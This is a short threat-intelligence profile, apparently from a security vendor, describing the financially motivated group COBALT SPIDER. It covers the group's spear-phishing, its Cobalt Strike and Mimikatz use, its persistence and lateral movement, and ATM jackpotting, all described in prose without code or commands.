COBALT SPIDER is a financially-motivated criminal group responsible for attacks on financial institutions (FIs) in Russia, Central Asia and Eastern Europe.
The adversary uses spear-phishing emails containing malicious attachments to gain access to corporate infrastructure, often exploiting known vulnerabilities through publicly available malware and tools, and was named because they are associated with the use of the Cobalt Strike Beacon payload in their operations.
Cobalt Strike is a commercial penetration testing tool that gets loaded into RAM and allows the attackers to open a connection to the infected machine, manage and download additional modules, log keystrokes and conduct port scanning. The Mimikatz module is used to harvest credentials and escalate privileges, giving the attackers greater control of the machine and access across the network.
COBALT SPIDER achieves persistence on the victim machine by creating a startup path to launch malicious code using PowerShell, which subsequently invokes a connection to a C2 server to reinstall the Cobalt Strike payload each time the machine is rebooted, rather than writing it to disk. Native Windows operating system capabilities, such as Explorer, are used to connect to additional machines and move laterally within the victim network.
The adversary monetizes attacks by targeting ATM machines and issuing commands to dispense cash in a technique termed “Jackpotting.” The cash is then collected by a network of money mule operatives who work as part of the campaign team.
It should be noted that COBALT SPIDER actors are not the developers of the Cobalt Strike penetration testing tool and should not be confused with other adversaries also using this software in campaign activity.
Cobalt Group and Cobalt Gang are community/industry names associated with this actor.
To learn more about how to incorporate intelligence on threat actors like COBALT SPIDER into your security strategy, please visit the Falcon Intelligence product page.